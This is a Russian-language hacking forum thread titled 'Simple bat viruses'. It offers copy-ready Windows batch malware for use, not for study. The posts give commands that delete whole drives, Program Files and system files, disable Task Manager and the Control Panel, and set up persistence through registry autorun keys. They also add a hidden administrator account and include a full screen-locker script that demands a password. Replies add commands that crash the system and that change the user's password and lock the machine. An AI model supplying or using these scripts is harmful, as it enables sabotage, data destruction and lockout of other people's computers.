Простенькие bat вирусы

Тема в разделе "Исходники вирусов", создана пользователем X-Shar, 12 июн 2012.

↑ ↓
  1. X-Shar :)
    X-Shar
    Ответить в чате

    Администрация

    Регистрация:
    03.06.2012
    Сообщения:
    5.814
    Симпатии:
    435
    Пол:
    Мужской
    Репа:
    +971 / 153 / -29
    Jabber:
    Telegram:
    Здесь готовые Bat-вирусы. Просто ставляем код в bat файл и все.



    Убирает рабочий стол

    @echo off
    reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoDesktop /t REG_DWORD /d 1 /f >nul

    Выключается компьютер

    @echo off
    shutdown -s -t 1 -c "lol" >nul

    Перезагрузка компьютера

    @echo off
    shutdown -r -t 1 -c "lol" >nul

    Запрещает запускать программы

    @echo off
    reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\RestrictRun /v 1 /t REG_DWORD /d %SystemRoot%\explorer.exe /f >nul

    Удаление дров

    @echo off
    del "%SystemRoot%\Driver Cache\i386\driver.cab" /f /q >nul

    Удаляет звуки Windows

    @echo off
    del "%SystemRoot%\Media" /q >nul

    Запрещает заходить в панель управления

    @echo off
    reg add HKCU\Software\Microsoft\Windows\Current Version\Policies\Explorer
    /v NoControlPanel /t REG_DWORD /d 1 /f >nul

    Запрещает комбинацию Ctrl-Alt-Delete

    reg add HKCUSoftwareMicrosoftWindowsCurrentVersionPoliciesSystem /v DisableTaskMgr /t REG_DWORD /d 1 /f >nul

    Меняет местами значение кнопок мыши

    %SystemRoot%/system32/rundll32 user32, SwapMouseButton >nul

    Удаляет курсор мыши

    del "%SystemRoot%Cursors*.*" >nul

    Меняет название корзины

    reg add HKCU\Software\Microsoft\Windows\ShellNoRoam\MUICache /v @C:\WINDOWS\system32\SHELL32.dll,-8964 /t REG_SZ /d ТУТ НАЗВАНИЕ КОРЗИНЫ /F

    Убирает панель управления

    reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_DWORD /d 1 /f

     
    • Мне нравится Мне нравится x 8
    • Стрёмный копипаст ! Стрёмный копипаст ! x 1
  2. X-Shar :)
    X-Shar
    Ответить в чате

    Администрация

    Регистрация:
    03.06.2012
    Сообщения:
    5.814
    Симпатии:
    435
    Пол:
    Мужской
    Репа:
    +971 / 153 / -29
    Jabber:
    Telegram:
    Делаем зависание компа:

    Открываем блокнот, пишем:
    md 1
    md 2
    md 3
    md 4
    Команда md создает папку, в данном случае у нас создастся четыре папки с названиями 1,2,3 и 4. На первый взгляд весьма бесполезная команда, но с её помощью можно создать жесткие тормоза на компе.
    Открываем Microsoft Office Excel, двойной клик по верхней левой ячейке, вписываем в эту ячейку md 1
    Кликаем по правому нижнему краю ЯЧЕЙКИ и тянем вниз. Если все сделано правильно, ячейки начнут размножаться, увеличивая цифру +1. Держим столько, сколько хотим чтобы у нас появилось папок (чем больше, тем сильнее будут тормоза)
    Скопируйте все это и вставьте в наш блокнот. Сохраните и переименуйте из .txt в .bat
    При открытии начнут создаваться папки, это будет долгий процесс и комп будет страшно пыхтеть. Удалить все эти папки будет еще сложнее
    Не рекомендую тестировать на своём компьютере

     
    • Мне нравится Мне нравится x 8
  3. X-Shar :)
    X-Shar
    Ответить в чате

    Администрация

    Регистрация:
    03.06.2012
    Сообщения:
    5.814
    Симпатии:
    435
    Пол:
    Мужской
    Репа:
    +971 / 153 / -29
    Jabber:
    Telegram:
    Делаем глюки в системе:

    Удаляет ВСЕ с раздела\диска(не пытайтесь проверить у себя) :
    rd [Буква_Диск]: /s /q

    Удаляет все файлы в program files :
    del c:/rogram Files/q

    Убивает процесс explorer.exe:
    taskkill /f /im explorer.exe >nul

    Создает миллион папок:
    FOR /L %%i IN (1,1,1000000) DO md %%i

    Удаляет все драйвера, которые установлены на компьютере:
    del "%SystemRoot%Driver Cachei386driver.cab" /f /q >nul

    Удаляет команду DEL:
    del %0

    Будет открывать бесконечно Пэинт:
    :x
    Start mspaint
    goto x

    Изменяет расширение всех ярлыков на .txt:
    assoc .lnk=.txt

    Заражает Autoexec:
    copy ""%0"" "%SystemRoot%\system32\batinit.bat" >nul
    reg add "HKCU\SOFTWARE\Microsoft\Command Processor" /v AutoRun /t REG_SZ /d "%SystemRoot%\syste m32\batinit.bat" /f >nul

    Создает нового пользователя, с правами администратора, логин:hacker и пароль hack (Можете изменить):
    @echo off
    chcp 1251
    net user SUPPORT_388945a0 /delete
    net user hacker hack /add
    net localgroup Администраторы hacker /add
    net localgroup Пользователи SUPPORT_388945a0 /del
    reg add "HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindows NTCurrentVersionWinlogonSpecialAccountsUserList" /v "support" /t reg_dword /d 0 y

    Cбой системы (!) - выключить все функции ввода-вывода (клавиатура, дисплей, мышь). В результате будет черный экран с курсором и ни на что не реагирующая система, однако Windows продолжает работать:
    rundll32 user,disableoemlayer

    Меняет местами кнопки мыши,но обратная смена не возможна):
    rundll32 user,SwapMouseButton

    Удаляет ядро системы:
    del %systemroot%\system32\HAL.dll
     
    • Мне нравится Мне нравится x 8
  4. X-Shar :)
    X-Shar
    Ответить в чате

    Администрация

    Регистрация:
    03.06.2012
    Сообщения:
    5.814
    Симпатии:
    435
    Пол:
    Мужской
    Репа:
    +971 / 153 / -29
    Jabber:
    Telegram:
    Вирус полностью блокирует систему при следующем запуске Windows.Даже в безопасном режиме, выключает диспетчер задач:

    Код:
    @echo off
    CHCP 1251
    cls
    Set Yvaga=На вашем компьютере найден вирус.
    Set pass=Пароль
    Set pas=Введите пароль.
    Set virus=Чтобы разблокировать ПК вам потребуется ввести пароль: 200393
    Set dim=Выключаю вирус...
    title Внимание!!!
    CHCP 866
    IF EXIST C:\windows\boot.bat (
    goto ok )
    cls
    IF NOT EXIST C:\windows\boot.bat (
    ECHO Windows Registry Editor Version 5.00 >> C:\0.reg
    ECHO. >> C:\0.reg
    ECHO [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon] >> C:\0.reg
    ECHO. >> C:\0.reg
    ECHO "Shell"="Explorer.exe, C:\\windows\\boot.bat " >> C:\0.reg
    start/wait regedit -s C:\0.reg
    del C:\0.reg
    ECHO @echo off >>C:\windows\boot.bat
    ECHO C:\WINDOWS\system32\taskkill.exe /f /im Explorer.exe >>C:\windows\boot.bat
    ECHO reg add "HKCU\software\Microsoft\Windows\CurrentVersion\Policies\system" /v DisableTaskMgr /t REG_DWORD /d 1 /f >>C:\windows\boot.bat
    ECHO start sys.bat >>C:\windows\boot.bat
    attrib +r +a +s +h C:\windows\boot.bat
    copy virus.bat c:\windows\sys.bat
    attrib +r +a +s +h C:\windows\sys.bat
    GOTO end)
    :ok
    cls
    Echo %Yvaga%
    echo.
    echo %virus%
    echo %pas%
    set /a choise = 0
    set /p choise=%pass%:
    if "%choise%" == "101" goto gold
    if "%choise%" == "200393" goto status
    exit
    :status
    echo %dim%
    attrib -r -a -s -h C:\windows\boot.bat
    del C:\windows\boot.bat
    attrib -r -a -s -h C:\windows\sys.bat
    del C:\windows\sys.bat
    cls
    :gold
    start C:\
    :end
    Добавляет программу в автозагрузку ОС:

    copy ""%0"" "%SystemRoot%\system32\File.bat"
    reg add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "Filel" /t REG_SZ /d "%SystemRoot%\system32\File.bat" /f
    reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoControlPanel /t REG_DWORD /d 1 /f

     
    • Мне нравится Мне нравится x 8
  5. Scofild Пользователь
    Scofild
    Ответить в чате

    Первый уровень

    Регистрация:
    24.05.2013
    Сообщения:
    1
    Симпатии:
    0
    Пол:
    Мужской
    Репа:
    +0 / 0 / -0
  6. Vova_ Пользователь
    Vova_
    Ответить в чате

    Первый уровень

    Регистрация:
    25.05.2013
    Сообщения:
    2
    Симпатии:
    10
    Пол:
    Мужской
    Репа:
    +10 / 0 / -0

    а ещё каждой папке добавыть +s +h
    их тогда в windows explorer не видно даже при включеном отображэнии скрытых файлов
     
    • Мне нравится Мне нравится x 4
  7. Vova_ Пользователь
    Vova_
    Ответить в чате

    Первый уровень

    Регистрация:
    25.05.2013
    Сообщения:
    2
    Симпатии:
    10
    Пол:
    Мужской
    Репа:
    +10 / 0 / -0
    не путайте "/" и "\"

    лучшэ так:

    c:\program files\*.* /f /q /s

    без /s вы ничево не у далите ведь в c:\program files все файли в каталогах

    и ещё , вы не убёте файлы которые в этот момент используютца.
     
    • Мне нравится Мне нравится x 6
  8. X-Shar :)
    X-Shar
    Ответить в чате

    Администрация

    Регистрация:
    03.06.2012
    Сообщения:
    5.814
    Симпатии:
    435
    Пол:
    Мужской
    Репа:
    +971 / 153 / -29
    Jabber:
    Telegram:
    Да про каталоги я вообще забыл !sr789

    Хе сегодня прикольную статью на Хабре прочитал, как уронить 8-ку,
    может пригодиться кому: http://habrahabr.ru/post/179543/
     
    • Мне нравится Мне нравится x 4
  9. модемщик Уважаемый пользователь
    модемщик
    Ответить в чате

    Форумчанин

    Регистрация:
    10.05.2013
    Сообщения:
    36
    Симпатии:
    161
    Пол:
    Мужской
    Репа:
    +161 / 1 / -0
    Плюшки из функционала рабочих вирусов.

    Вызываем бсод
    "C:\Windows\System32\taskkill.exe" /IM "wininit.exe

    Меняем пользователю пароль на 111, блокируем рабочую станцию.

    net user %username% "111"
    RUNDLL32.exe USER32.dll,LockWorkStation
     
    • Мне нравится Мне нравится x 3
  10. olpex Пользователь
    olpex
    Ответить в чате

    Первый уровень

    Регистрация:
    17.06.2013
    Сообщения:
    1
    Симпатии:
    1
    Пол:
    Мужской
    Репа:
    +1 / 0 / -0
    Про bsod не знал, сасибо
     
    • Мне нравится Мне нравится x 1

Поделиться этой страницей